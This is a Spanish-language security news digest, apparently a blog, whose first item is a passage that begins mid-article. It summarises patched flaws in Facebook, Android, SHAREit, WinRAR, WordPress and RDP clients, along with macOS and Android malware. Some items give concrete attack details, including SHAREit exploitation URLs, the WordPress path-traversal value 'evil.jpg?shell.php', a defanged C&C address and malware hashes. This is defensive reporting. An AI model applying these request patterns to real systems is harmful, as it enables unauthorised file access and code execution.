Para evitar esto, el engaño se hará mediante la autorización de una aplicación del atacante mediante un enlace similar al que se muestra en la siguiente imagen.

Esto autorizará la aplicación y redireccionará a una página en manos del atacante con el token de acceso de la víctima como parámetro en la dirección web gracias una redirección intermedia a https://www.facebook.com/v3.2/dialog/oauth

Una vez realizadas las redirecciónes, el atacante tendrá en su poder el token de acceso de la víctima, y a continuación añadirá el correo electrónico bajo su control como punto de contacto de la cuenta, que volverá a redireccionar a una página bajo el control del atacante mediante una petición similar a la siguiente.

Con esto el sitio web del atacante obtendrá el ID del usuario y podrá confirmar por su parte el correo añadido. Para confirmar el correo por la parte de la víctima el atacante redireccionará a la siguiente dirección gracias a que los datos necesarios son extraídos del correo de confirmación del atacante.

Después de esto solo quedará hacer que la víctima acceda a la dirección https://www.facebook.com/settings?section=emailque volverá a redirigir al recurso “/confirm_code/dialog/submit/” para terminar de realizar la validación del correo electrónico.

Tras esto, el atacante podrá tener acceso a la cuenta de la victima gracias a la funcionalidad de restablecer la contraseña. Un proceso que parece muy tedioso y largo, pero que realmente se hace en poco tiempo de forma automática.

El error fue reportado a Facebook el día 26 de enero y fue corregido 5 días después, por lo que actualmente no supone ningún peligro,. Aún así queremos hacer hincapié en el peligro que puede suponer el visitar un enlace que puedan tener un origen sospechoso o desconocido, ya que un error de este calibre puede permitir al atacante hacerse pasar por la víctima con todo lo que ello conlleva, incluso eliminar la cuenta.

Más información:

Bug bounty write-ups
https://ysamm.com/?p=185

RCE en dispositivos Android al visualizar una imagen PNG

Un atacante remoto podría ejecutar código en dispositivos Android si el usuario visualizara una imagen PNG especialmente manipulada. Esto es debido a nuevas vulnerabilidades descubiertas y publicadas en el ‘Android Security Bulletin‘ de febrero.

thehachernews.com

Son varias las vulnerabilidades descubiertas e incluidas en el citado boletín, aunque las más críticas se encuentran al nivel de Framework.

Los ingenieros de Google aun no han revelado los detalles técnicos de estos fallos, aunque se sabe que hace referencia a errores enSkPngCodec, y explican que “El problema más grave es una vulnerabilidad crítica en el Framework que podría permitir que un atacante remoto ejecutar código arbitrario a través de un archivo PNG especialmente diseñado.

Las vulnerabilidades identificadas como CVE-2019-1986, CVE-2019-1987 y CVE-2019-1988 ya han sido parcheadas por Android Open Source Project (AOSP) junto con las que aparecen en la lista de actualizaciones de seguridad de febrero. Sin embargo debido a la demora de los fabricantes en aplicar las actualizaciones en sus productos, es difícil saber cuando estará disponible la actualización para los dispositivos afectados. Las versiones de Android afectadas van desde 7.0 Nougat hasta la actual 9.0 Pie.

Por último, Google destaca que no hay indicios de explotación de estas vulnerabilidades por el momento.

Más información:

Android Security Bulletin
https://source.android.com/security/bulletin/2019-02-01.html

The hacker way
https://thehackernews.com/2019/02/hack-android-with-image.html

Un fallo de seguridad en Facebook permite ver fotos privadas de otros usuarios

Un investigador ha reportado recientemente un fallo de seguridad en Facebook que permitía visualizar las fotos privadas de otros usuarios.

La vulnerabilidad se descubrió en portal.facebook.com, la web de Facebook para su dispositivo ‘Portal’, que está diseñado principalmente para realizar videollamadas.

En la web de Portal disponemos de una pequeña ventana de chat para soporte, en la que podemos realizar consultas a un bot. Además de texto, es posible incluir imágenes y archivos en el chat, introduciendo esta funcionalidad la vulnerabilidad. Aunque inicialmente este fallo fue descubierto en este chat de soporte, según el investigador, el chat de Facebook también era vulnerable.

El problema se encontraba en que al subir un fichero o una foto, este recibe un identificador numérico de igual forma que ocurre con el resto de fotos subidas a Facebook. Después de realizar la subida de la foto,se realiza una nueva petición que envía un nuevo mensaje de tipo foto al chat. Si se sustituye en dicho mensaje el identificador de la foto por el identificador de cualquier otra foto, al enviar el mensaje y visualizarlo veremos automáticamente la foto correspondiente al identificador modificado.

Petición de envío de mensaje con el identificador de la foto
Aunque la explotación de esta vulnerabilidad está limitada debido a que es necesario indicar el identificador de la foto que queremos ver, un atacante podría realizar un ataque de fuerza bruta para obtener fotos privadas de otros usuarios debido al uso de identificadores numéricos.
Facebook ya ha corregido el fallo, por lo que ya no es posible explotarlo.
Más información:

 

Nueva campaña de Phishing contra Facebook

Si eres de los que confían en las comprobaciones básicas para detectar si la web que se muestra se trata de una copia fraudulenta es muy posible que caigas en esta nueva campaña de phishing contra Facebook.

El equipo de Antoine Vincent Jebara, cofundador y director ejecutivo del software de gestión de contraseñas Myki, descubrió una nueva campaña de phishing.

Los atacantes están distribuyendo enlaces a blogs y servicios que inciten a los usuarios a “iniciar sesión con su cuenta de Facebook” para leer documentos exclusivos u obtener descuentos en la compra de artículos.

Hasta aquí todo bien, el inicio de sesión con Facebook está siendo utilizado por gran cantidad de páginas para facilitar al usuario la suscripción a servicios, sin embargo, el equipo de Vincent descubrió que los blogs y servicios en línea maliciosos están mostrando un mensaje, muy realista, de inicio de sesión con Facebook.

como se muestra en el vídeo, el falso mensaje de inicio de sesión creado con HTML y JavaScript, es igual a la ventana que muestra Facebook de forma legítima cuando queremos iniciar sesión a través de su servicio.

Según Vincent la única forma de darnos cuenta de que nos están intentando dar gato por liebre es tratar de arrastrar la ventana POPUP fuera de la ventana en la que se está mostrando. Si falla, es decir, parte del menú de la ventana POPUP desaparece más allá del borde de la ventana, es una señal de que la ventana es falsa.

Otra recomendación es activar la autenticación en dos pasos, para evitar que los atacantes accedan a nuestra cuenta si por algún casual nuestros datos han sido comprometidos.

Los ataques de phishing siguen siendo una de las principales amenazas contra empresas y usuarios y cada día que pasa descubrimos maneras mucho más creativas de engañarnos y robar nuestros datos.

¡Estad atentos! 

Actualizaciones para múltiples dispositivos Cisco

Cisco ha publicado 20 boletines de seguridad para solucionar otras tantas vulnerabilidades (una crítica, 8 de gravedad alta y 11 de gravedad media) en múltiples productos que podrían permitir a atacantes provocar condiciones de denegación de servicio, de cross-site scripting, ejecutar código arbitrario o acceder al dispositivo sin autorización.

Los productos afectados son:

  • Cisco ACI Virtual Edge
  • Cisco Aironet 1560, 1815, 2800, 3800 Series
  • Cisco AMP Virtual Private Cloud Appliance
  • Cisco Application Policy Infrastructure Controller
  • Cisco Cloud Services Platform 2100
  • Cisco CloudCenter
  • Cisco Common Services Platform Collector
  • Cisco Container Platform
  • Cisco Defense Orchestrator
  • Cisco DNA Center
  • Cisco Elastic Service Controller
  • Cisco Elastic Services
  • Cisco Emergency Responder
  • Cisco Enterprise NFV Infrastructure Software (NFVIS)
  • Cisco Enterprise Service Automation
  • Cisco Evolved Programmable Network Manager
  • Cisco Expressway Series
  • Cisco Finesse
  • Cisco Firepower 9000 Series
  • Cisco Firepower eXtensible Operating System
  • Cisco Firepower Management Center
  • Cisco Firepower Threat Defense
  • Cisco FireSIGHT System Software
  • Cisco HyperFlex
  • Cisco Identity Services Engine
  • Cisco IOS XE Software
  • Cisco IoT Field Network Director
  • Cisco IOx Fog Director
  • Cisco IP Phone 7800, 7832, 8800 Series
  • Cisco MDS 9000 Series Multilayer Switches
  • Cisco MediaSense
  • Cisco Meeting Management
  • Cisco Meeting Server
  • Cisco Mobility Services Engine
  • Cisco Network Analysis Module
  • Cisco Network Assurance Engine
  • Cisco Network Assurance Engine
  • Cisco Network Convergence System 1000 Series
  • Cisco Nexus 3000, 7000, 9000 Series
  • Cisco Paging Server
  • Cisco Policy Suite
  • Cisco Prime Collaboration
  • Cisco Prime Collaboration Assurance
  • Cisco Prime Infrastructure
  • Cisco Prime Infrastructure
  • Cisco Prime Network Registrar Virtual Appliance
  • Cisco Prime Service Catalog Virtual Appliance
  • Cisco Secure Access Control System (ACS)
  • Cisco SocialMiner
  • Cisco SPA112, SPA525, y SPA5x5 Series
  • Cisco TelePresence
  • Cisco Tetration Analytics
  • Cisco Threat Grid Appliance
  • Cisco UCS B-Series M5 Blade Servers
  • Cisco UCS Standalone C-Series M5 Rack Server
  • Cisco Umbrella Virtual Appliance
  • Cisco Unified Communications
  • Cisco Unified Contact Center
  • Cisco Unified Intelligence Center
  • Cisco Unity Connection
  • Cisco Unity Connection
  • Cisco vEdge 100, 1000, 2000, 5000 Series
  • Cisco vEdge Cloud Router Platform
  • Cisco Video Surveillance 8000 Series IP Cameras
  • Cisco Virtual Topology System
  • Cisco Virtualized Voice Browser
  • Cisco Webex Hybrid Data Security Node
  • Cisco Webex Meetings Server
  • Cisco Webex Room Kit
  • Cisco Webex Video Mesh Node
  • Cisco Wireless LAN Controller (WLC 5520, WLC 8540, WLC 3504, Virtual Wireless Controller)

La vulnerabilidad considerada crítica, con CVE-2018-0121, afecta al portal web de Cisco Elastic Services y permitiría a un atacante remoto sin autenticar acceder al sistema como administrador. Las ocho vulnerabilidades de gravedad alta permitirían escalar privilegios en dispositivos Cisco ASA, Cisco Nexus, Cisco IOS XE, Cisco IOS XR entre otros (CVE-2019-5736); realizar ataques man-in-the-middle contra el túnel SSL establecido entre los servicios Cisco Service Identity Engine y Cisco Prime (CVE-2019-1659); acceder a partes no autorizadas del software Cisco Prime Collaboration Assurance (PCA) utilizando algún nombre de usuario válido (CVE-2019-1662); recuperar ficheros del servidor TFTP utilizado en Cisco Network Convergence System 1000 (CVE-2019-1681); permitir a un usuario adyacente sin autenticar ejecutar comandos como administrador (CVE-2018-15380) o a un usuario local elevar privilegios a administrador en Cisco HyperFlex (CVE-2019-1664).

Otra de las vulnerabilidades de gravedad alta afecta al kernel Linux de algunos dispositivos (CVE-2018-5391) y permitiría a un atacante remoto sin autenticar provocar una denegación de servicio enviando paquetes IPv4 o IPv6 especialmente manipulados.

La última de las vulnerabilidades de gravedad alta reside en el componente encargado de la autenticación de Cisco Network Assurance Engine (NAE) y permitiría a un atacante local provocar una denegación de servicio en el servidor (CVE-2019-1688).

Vulnerabilidades consideradas de importancia media podrían ser aprovechadas para inyectar contenido en Cisco Webex (CVE-2019-1680) o subir ficheros arbitrarios en su versión para IOS (CVE-2019-1689). Espiar el tráfico TLS en Cisco SPA112, SPA525 y SPA5x5 (CVE-2019-1683); un XEE en Cisco IoT Field Network Director (CVE-2019-1698); denegaciones de servicio en Cisco Firepower y Cisco IP Phone (CVE-2019-1691, CVE-2019-1700, CVE-2019-1684); un XSS en Cisco HyperFlex y Cisco Unity (CVE-2019-1665, CVE-2019-1685) o accesos de lectura y escritura no autorizados a las estadísticas de Cisco HyperFlex (CVE-2019-1667, CVE-2019-1666).

Cisco ha publicado actualizaciones para las vulnerabilidades consideradas de gravedad crítica y alta. Se recomienda consultar las alertas publicadas para obtener información sobre disponibilidad de parches y actualizaciones.

Más información:

Container Privilege Escalation Vulnerability Affecting Cisco Products
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190215-runc

Cisco Prime Infrastructure Certificate Validation Vulnerability
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190220-prime-validation

Cisco Prime Collaboration Assurance Software Unauthenticated Access Vulnerability
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190220-pca-access

Cisco Network Convergence System 1000 Series TFTP Directory Traversal Vulnerability
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190220-ncs

Cisco HyperFlex Software Command Injection Vulnerability
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190220-hyperflex-injection

Cisco HyperFlex Software Unauthenticated Root Access Vulnerability
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190220-chn-root-access

Cisco Webex Meetings Online Content Injection Vulnerability
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190206-webex-injection

Cisco Webex Teams for iOS Arbitrary File Upload Vulnerability
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190220-webx-ios-file

Cisco SPA112, SPA525, and SPA5x5 Series IP Phones Certificate Validation Vulnerability
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190220-ipphone-certs

Cisco IoT Field Network Director XML External Entity Vulnerability
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190220-iot-fnd-xml

Cisco Hyperflex Stored Cross-Site Scripting Vulnerability
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190220-hyper-xss

Cisco HyperFlex Arbitrary Statistics Write Vulnerability
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190220-hyper-write

Cisco HyperFlex Unauthenticated Statistics Retrieval Vulnerability
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190220-hyper-retrieve

Cisco Firepower Threat Defense Software SSL or TLS Denial of Service Vulnerability
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190220-fpwr-ssltls-dos

Cisco Firepower 9000 Series Firepower 2-Port 100G Double-Width Network Module Queue Wedge Denial of Service Vulnerability
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190220-firpwr-dos

Cisco Unity Connection Reflected Cross-Site Scripting Vulnerability
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190220-cuc-rxss

Cisco IP Phone 7800 and 8800 Series Cisco Discovery Protocol and Link Layer Discovery Protocol Denial https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190220-cdp-lldp-dosof

Linux Kernel IP Fragment Reassembly Denial of Service Vulnerability Affecting Cisco Products
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180824-linux-ip-fragment

Cisco Network Assurance Engine CLI Access with Default Password Vulnerability
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190212-nae-dos

Cisco Elastic Services Controller Service Portal Authentication Bypass Vulnerability
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180221-esc

Nuevas vulnerabilidades en redes móviles 4G y 5G

Un grupo de investigadores universitarios han descubierto nuevas vulnerabilidades en las redes de telefonía 4G y 5G que podría permitir a un atacante remoto evadir las protecciones de seguridad implementadas en dichos protocolos.

A continuación se describen los tres ataques descubiertos.

  • Ataque ToRPEDO

Es la abreviación de “TRacking via Paging mEssage DistributiOn“. Afecta a las redes 4G y la implementación actual de 5G.

Este ataque permite a atacantes remotos comprobar la localización del terminal de la víctima, inyectar mensajes de aviso o “paging“, y provocar denegaciones de servicio.

Cuando el dispositivo no está comunicándose con la red GSM, entra en un modo de bajo consumo. De modo que cuando se recibe una llamada o un SMS, la red GSM envía un mensaje “paging” para notificar al dispositivo de la llamada/SMS entrante.

Los mensajes “paging” incluyen un valor llamado “Temporary Mobile Subscriber Identity” del dispositivo, el cual no cambia con frecuencia. Sin embargo los investigadores descubrieron que si un atacante comienza una llamada e inmediatamente después la cancela varias veces en un corto periodo de tiempo, la estación base actualiza el valor de TMSI con bastante frecuencia en los mensajes “paging“.

Por tanto, un atacante que logre interceptar tráfico de una víctima mediante el uso de dispositivos “stingrays“, podrá ver los mensajes “paging” y deducir si dicha víctima se encuentra dentro del rango de interceptación o no.

  • Ataque Piercer e IMSI-Cracking

El ataque ToRPEDO abre la puerta a otros dos tipos de ataque; Piercer e IMSI-Cracking, llegando a revelar elIMSI (identidad persistente)

PIERCER (Persistent Information ExposuRe by the CorE netwoRk), permite a un atacante que conozca el número de teléfono de la víctima, obtener el IMSI en las redes 4G y 5G, usando fuerza bruta debido a un error de diseño.

Una vez el IMSI ha sido comprometido, las llamadas de la víctima, localización y demás información sensible pueden ser espiadas.

Más información:

New Attacks Against 4G, 5G Mobile Networks Re-Enable IMSI Catchers
https://thehackernews.com/2019/02/location-tracking-imsi-catchers.html

Vulnerabilidades en la app SHAREit de Android permiten el robo de ficheros

La aplicación, muy popular en la Play Store con más de 500 millones de descargas, permitía descargar archivos desde un dispositivo de la misma red.

1_5DCdZLwfJpQXCR5-6sQhyg

SHAREit es una conocida aplicación disponible para Android, iOS y Windows, que permite compartir ficheros con otros usuarios de forma sencilla. Con sus más de 1.500 millones de usuarios entre las 3 plataformas (500 millones en Android), es una de las aplicaciones más populares para este fin.

De las diferentes modalidades y servicios utilizados para compartir archivos en SHAREit, se han descubierto varios fallos en Download Channel (a través de http en el puerto 2999), encargado de la descarga de ficheros.

El primer fallo se encuentra en el identificador único ‘msgid’ (‘http://shareit_sender_ip:2999/download?metadatatype=photo&metadataid=1337&filetype=thumbnail&msgid=c60088c13d6?) que valida en la descarga que el fichero solicitado es el entregado por el cliente. Una incorrecta validación de dicho valor, permite a cualquier usuario autenticado solicitar cualquier fichero del dispositivo, sin que se haya autorizado previamente.

Aunque el error en ‘msgid’ es de por sí grave, se sigue requiriendo estar autenticado para realizar la descarga. No obstante, un fallo en la implementación del servidor HTTP de Download Channel, provoca que los paths no definidos en vez de devolver un error 404, devuelvan un 200, y se llegue a crear una sesión válida en el servidor. Así pues, autenticarse es tan fácil como realizar una petición a una ruta no existente, como por ejemplo http://shareit_sender_ip:2999/DontExist.

Estos dos errores son de por sí muy graves, pero sigue sin conocerse los ficheros disponibles para descargar. No obstante, el fichero de historial de SHAREit, el cual se encuentra en una ruta conocida, contiene las rutas de todos los ficheros compartidos, lo cual revela bastantes rutas del sistema. Además, en las últimas versiones de SHAREit se incluye una base de datos de medios (también en una ruta conocida) con ficheros del sistema, junto con muchísima información interesante como claves o cookies si se ha utilizado el modo webview de SHAREit.

Estos fallos ya han sido corregidos tras la versión 4.0.38 de la aplicación, aunque la relación entre los desarrolladores y los investigadores no ha sido buena. Shareit Technologies no ha respondido por la mayoría de las vías de comunicación, se ha negado a publicar el fallo con un CVE, y no ha agradecido de ninguna forma el reporte de los errores. Tampoco han notificado de ninguna forma a los usuarios, limitándose a lanzar una nueva versión en silencio.

El equipo de investigadores de RedForce, quienes han descubierto los fallos, han liberado una prueba de concepto en su cuenta de Github.

Fuentes:

SHAREit Multiple Vulnerabilities Enable Unrestricted Access to Adjacent Devices’ Files:
https://blog.redforce.io/shareit-vulnerabilities-enable-unrestricted-access-to-adjacent-devices-files/

An exploit for SHAREit <= v 4.0.38:
https://github.com/redforcesec/DUMPit/

Administradores de contraseñas, ¿tan seguros como parecen?

Se han descubierto debilidades en administradores de contraseñas que muestran las credenciales en texto plano en el momento de ejecución e incluso las mantiene almacenadas en memoria mientras la aplicación está funcionando, aún habiéndose cerrado sesión o bloqueado el administrador de passwords.

El equipo de investigadores de Independent Security Evaluator (ISE) ha analizado diferentes gestores de contraseñas, y en cada uno de los casos han obtenido fallos a la hora de gestionar la interacción con las bases de datos o en el uso de la clave maestra.

La buena noticia es que todos los administradores que han sido analizados mantienen con éxito las contraseñas seguras cuando el software no se esta ejecutando, permaneciendo cifradas en su base de datos.

Sin embargo, la cosa cambió cuando observaron cómo estos productos protegen las contraseñas cuando se está ejecutando, tanto en el estado de bloqueo (Cuando la aplicación está encendida pero no está la sesión iniciada) como de desbloqueo (sesión activa, después de ingresar la contraseña maestra). A continuación veremos una breve explicación de los resultados de la investigación.

1Password4 para Windows (v4.6.2.626)

Como puntos positivos de esta versión, en el caso de que un usuario acceda a varias contraseñas de la base de datos, una vez que está logeado, el programa se encarga de eliminar de memoria la contraseña anterior para cargar la nueva seleccionada.

Como punto negativo, tras iniciar sesión, la contraseña maestra se mantiene almacenada en memoria (aunque ofuscada), y al cerrar sesión el programa falla al limpiar dicha contraseña. Por otro lado encontraron un fallo cuando un usuario realiza ciertas acciones, la contraseña maestra se almacena en texto plano en memoria incluso cuando está bloqueado.

1password7 para Windows (v7.2.57)

A pesar de ser una versión actual, se descubrió que es menos segura que su predecesor 1password4, ya que descifra y cachea todas las contraseñas de la base de datos en vez de una por una. También falló al eliminar las contraseñas de memoria, incluyendo la maestra al cerrar sesión.

Dashlane para Windows (v6.1843.0)

Como puntos positivos Dashlane, al igual que 1password4, solo carga en memoria la contraseña que se está utilizando, eliminando la utilizada anteriormente. También destacar el uso de frameworks para el manejo de memoria y GUI que evitan que la información pase por diferentes APIs del sistema.

Como punto negativo, cuando el usuario actualiza algún dato, se expone la base de datos entera en texto plano, manteniéndose hasta incluso cuando cerramos sesión en la aplicación.

KeePass Password Safe (2.40)

Keepas es un proyecto Open Source, y al igual que 1password4, va descifrando según vamos utilizando cada contraseña, almacenándola en memoria. Lo que ocurre es que no va eliminando los registros después de ser utilizados por lo que al rato de ser utilizado, tendremos la lista de contraseñas usadas cargada en memoria. Por otro lado, una vez utilizada la contraseña maestra, se elimina y se vuelve irrecuperable.

LastPass (v4.1.59)

La base de datos entera permanece en memoria incluso cuando está bloqueada o cerramos sesión. Además, cuando se obtiene la clave de descifrado, la contraseña maestra se filtra en un string buffer, de donde no se elimina, incluso cuando la aplicación se bloquea.

Algunas de las marcas afectadas han defendido públicamente sus productos, afirmando que estos problemas descubiertos son parte de complejas decisiones o ‘trade-offs’ de diseño.

LastPass afirmó que había solucionado los problemas encontrados en su producto y señaló que un atacante aún requeriría acceso privilegiado a la máquina del usuario.

Más información:

Nakedsecurity.sophos.com
https://nakedsecurity.sophos.com/2019/02/21/password-managers-leaking-data-in-memory-but-you-should-still-use-one/

Independent Security Evaluators
https://www.securityevaluators.com/casestudies/password-manager-hacking/

WinRAR tarda 19 años en corregir una vulnerabilidad

Muchos somos los que hemos ayudado a que se proclame como uno de los programas más descargados de la historia, prácticamente ha llegado a convertirse en una pieza imprescindible para muchos usuarios. Actualmente se calcula queWinRAR está instalado en más de 500 millones de ordenadores, que ahora mismo son vulnerables al ataque.

Haciendo uso de este fallo el atacante puede elegir la ruta en la que quiere que se descomprima el archivo, sin importar la que haya elegido el usuario.

WinRAR ha tardado 19 años en corregir un grave fallo de seguridad. Investigadores de Check Point han publicado los detalles técnicos de ésta vulnerabilidad. Afecta a las últimas versiones lanzadas en los últimos 14 años. El fallo se encuentra en una librería de terceros que estaba usando WinRAR para descomprimir archivos con formato ACE. La librería afectada se llama UNACEV2.DLL.

El problema en WinRAR se da porque detecta el formato de los archivos basándose en su contenido, y no en la extensión. Eso hace que simplemente cambiando la extensión .ACE a .RAR, para que parezca un archivo normal, un atacante pueda ejecutar código arbitrario en un ordenador que intente descomprimir el archivo, siempre que se usen versiones vulnerables del programa, en un fallo conocido como “Absolute Path Traversal”.

Haciendo uso de este fallo el atacante puede elegir la ruta en la que quiere que se descomprima el archivo, sin importar la que haya elegido el usuario.
El equipo de Check Point nos muestra cómo explotan la vulnerabilidad en el siguiente video.

Como hemos visto descomprimen el archivo en el escritorio, pero en realidad se ha creado un archivo .exe en Inicio, por lo que cuando nuestro ordenador se encienda ese archivo se ejecutará.

WinRAR ha corregido la vulnerabilidad eliminando la librería afectada en la versión 5.70 Beta 1, por lo que se recomienda actualizar a la última versión.

Vulnerabilidad crítica en WordPress pasa desapercibida durante más de 6 años

Investigadores de seguridad de RIPS Technologies GmbH han publicado una investigación en la que se revela la existencia de una ejecución remota de código (RCE) que afecta a todas las versiones de worpress liberadas desde hace 6 años atrás.

Este RCE se reportó al equipo de seguridad de WordPress a finales de 2018 y permite a un atacante con una cuenta con permisos de edición de tipo “author” ejecutar código PHP arbitrario. Este requisito reduce la severidad hasta cierto punto.

Para lograr la ejecución remoto de código, se combina un Path Traversal (escapada de ruta) con un Local File Inclusion(inclusión arbitraria de ficheros).

Los investigadores se dieron cuenta de como una cuenta de tipo “author” puede modificar la información de las imágenes, pudiendo establecer valores arbitrarios que desembocan en un Path Traversal.

La idea es asignar a _wp_attached_file to evil.jpg?shell.php para más tarde realizar una solicitud HTTP a una URL como esta: https://targetserver.com/wp-content/uploads/evil.jpg?shell.php

Según los investigadores, la ejecución de código no es explotable en las versiones 5.0.1 y 4.9.9 ya que en esas versiones se parcheó otra vulnerabilidad que impide la explotación de la primera.

Más información:

https://blog.ripstech.com/2019/wordpress-image-remote-code-execution/

https://thehackernews.com/2019/02/wordpress-remote-code-execution.html

Una nueva familia de malware para MacOs pasa desapercibida al disfrazarse de un ejecutable de Windows

El laboratorio de Trend Micro ha compartido un análisis en la que detectaron una nueva variedad de malware para MacOS. La peculiaridad de la familia analizada reside en que se oculta disfrazándose de un archivo ejecutable de Windows .EXE.

La ejecución es posible debido a dos cosas:

  1. La comprobación de firma de código de MacOs solo se aplica a aplicaciones nativas.
  2. La aplicación ha sido creada con el framework mono e integra la posibilidad de la ejecución de este tipo de ficheros.

Lo curioso, que pese a ser un ejecutable de Windows, falla su ejecución en estas plataformas.

Examinando el comportamiento del malware podemos observar cómo, en primer lugar, recopila todas las aplicaciones instaladas y la siguiente información:

Nombre del modelo
Identificador de modelo
Velocidad del procesador
Detalles del procesador
Número de Procesadores
Numero de nucleos
Memoria
BootROMVersion
SMCVersion
Número de serie
UUID

Una vez recopilada y enviada la información a un servidor externo, el malware descarga y ejecuta algunas aplicaciones para MacOs ocultando la instalación de la misma como si se tratase de la aplicación de Adobe Flash

El código analizado ha sido encontrado en una aplicación que simulaba ser un popular firewall llamado Little Snitch, descargada a través de torrent.

IOCs:

setup.dmg

c87d858c476f8fa9ac5b5f68c48dff8efe3cee4d24ab11aebeec7066b55cbc53 TrojanSpy.MacOS.Winplyer.A
Installer.exe

932d6adbc6a2d8aa5ead5f7206511789276e24c37100283926bd2ce61e840045 TrojanSpy.Win32.Winplyer.A
OSX64_MACSEARCH.MSGL517

58cba382d3e923e450321704eb9b09f4a6be008189a30c37eca8ed42f2fa77af Adware.MacOS.MacSearch.A
chs2

3cbb3e61bf74726ec4c0d2b972dd063ff126b86d930f90f48f1308736cf4db3e Adware.MacOS.GENIEO.AB
Instalador (2)

e13c9ab5060061ad2e693f34279c1b1390e6977a404041178025373a7c7ed08a Adware.MacOS.GENIEO.AB
búsqueda de macs

b31bf0da3ad7cbd92ec3e7cfe6501bea2508c3915827a70b27e9b47ffa89c52e Adware.MacOS.MacSearch.B

Servidor C&C:
hxxp: //54.164.144.252: 10000 / loadPE / getOffers.php

Descubierto el primer malware en Play Store con secuestro de portapapeles

El investigador de seguridad Lukas Stefanko, ha descubierto un nuevo malware con la capacidad de secuestrar y cambiar el portapapeles para robar criptomonedas.

Oficialmente, Metamask es una extensión para los navegadores Chrome, Firefox, Opera y Brave, que permite establecer una “puerta de enlace” entre el navegador web y la red Ethereum, sin necesidad de instalar software adicional ni descargar toda la cadena de bloques de dicha red.

Este malware, de tipo “Clipper” se hace pasar por una aplicación legítima llamada Metamask (aunque no existe versión para android) y reemplaza las direcciones copiadas al portapapeles de android con la dirección del atacante.

La aplicación maliciosa se aprovecha del hecho de que las direcciones de los monederos se componen de caracteres alfanuméricos, de modo que los usuarios casi siempre prefieren copiarlas y pegarlas.

Como resultado, aquellos usuarios que transfirieron fondos en Ethereum a otros monederos, en realidad se depositaban en el monedero del atacante, mediante el reemplazo de la dirección pegada desde el portapapeles.

Después de reportar esta aplicación a Google, ésta ya no se encuentra en este momento en el Play Store.

En Koodous podemos encontrar una muestra de este malware, con hash 24d7783aaf34884677a601d487473f88:

Más información:

https://lukasstefanko.com/2019/02/android-clipper-found-on-google-play.html

https://www.welivesecurity.com/2019/02/08/first-clipper-malware-google-play/

https://thehackernews.com/2019/02/android-clickboard-hijacking.html

Múltiples clientes RDP vulnerables a ejecución remota de código

Un servidor malicioso sería capaz de ejecutar código en 3 de los principales clientes RDP: FreeRDP, rdesktop y mstsc.exe (el cliente de serie de Microsoft). No existe un parche para este último.

connection_box_thumb800

RDP (Remote Desktop Protocol) es un popular protocolo desarrollado por Microsoft para controlar equipos mediante interfaz gráfica de forma remota, para el que existen múltiples clientes tanto de software libre, como el propietario de Microsoft. Tras analizar el cliente oficial (mstsc.exe) y otros dos de software libre (FreeRDP y rdesktop), se ha encontrado que los 3 permitirían la ejecución remota de código en el cliente.

En el caso de FreeRDP, el más popular y maduro de los disponibles de software libre, se han encontrado 4 vulnerabilidades de tipo heap overflow (CVE 2018-8784 hasta CVE 2018-8787) que provocarían una corrupción de memoria, y probablemente la ejecución de código remoto. También se han encontrado otras dos de escritura fuera de límites (CVE-2018-8788 y CVE-2018-8789), ocasionando la primera corrupción de memoria con posible RCE (Remote Code Execution) y la segunda Denegación de Servicio (Segfault).

rdesktop, incluido de serie en Kali Linux y también bastante popular, es de los tres analizados el peor parado, con 11 vulnerabilidades graves, junto con otras 19 de diferente transcendencia. Los identificadores abarcan desde el CVE-2018-8791 hasta CVE-2018-8800, y desde CVE 2018-20174 hasta CVE-2018-20182. La mayoría de vulnerabilidades son de tipo lectura fuera de límites y diferentes tipos de overflow.

Finalmente, Mstsc.exe, el oficial de Microsoft, también sería vulnerable a un fallo RCE, aunque esta vez a través del portapapeles. El portapapeles, compartido entre servidor y cliente, presenta como principal problema que ambas partes podrían revelar información sensible como contraseñas que se hayan copiado, lo que podría considerarse una ‘feature’. No obstante, lo que se ha descubierto va más allá, al no controlar el cliente que la ruta de los archivos en el portapapeles no tengan un path traversal (como ‘..\file.txt’).

Un posible ejemplo de explotación, sería un usuario con una conexión RDP abierta a un servidor malicioso, que copia unos archivos (no necesariamente remotos) y los pega en un directorio local de su máquina. El servidor malicioso, al poder modificar el portapapeles, podría añadir un archivo adicional que se escribiría en una ruta del sistema, con los programas de arranque, y sin que el usuario pueda darse cuenta de que su portapapeles ha sido modificado.

El error ha sido notificado a Microsoft, pero ésta ha respondido que aunque reconoce el fallo, no considera el reporte válido al no cumplir sus criterios (Microsoft Security Servicing Criteria for Windows). Debido a esto, el error no puede tener CVE, y no cuenta con un parche. En caso de necesitar utilizar el cliente RDP de Microsoft, se recomienda desactivar el portapapeles compartido para evitar ser víctima de un posible ataque.

Fuente:

Reverse RDP Attack: Code Execution on RDP Clients:
https://research.checkpoint.com/reverse-rdp-attack-code-execution-on-rdp-clients/

Vulnerabilidades en el plugin de WordPress Forminator

Se han hecho públicas 5 vulnerabilidades que afectan a Forminator en su versión 1.5 y han sido calificadas de alto riesgo.

Forminator es un plugin para WordPress, con el que se pueden realizar de forma cómoda formularios de contacto, encuestas, pruebas, etc.

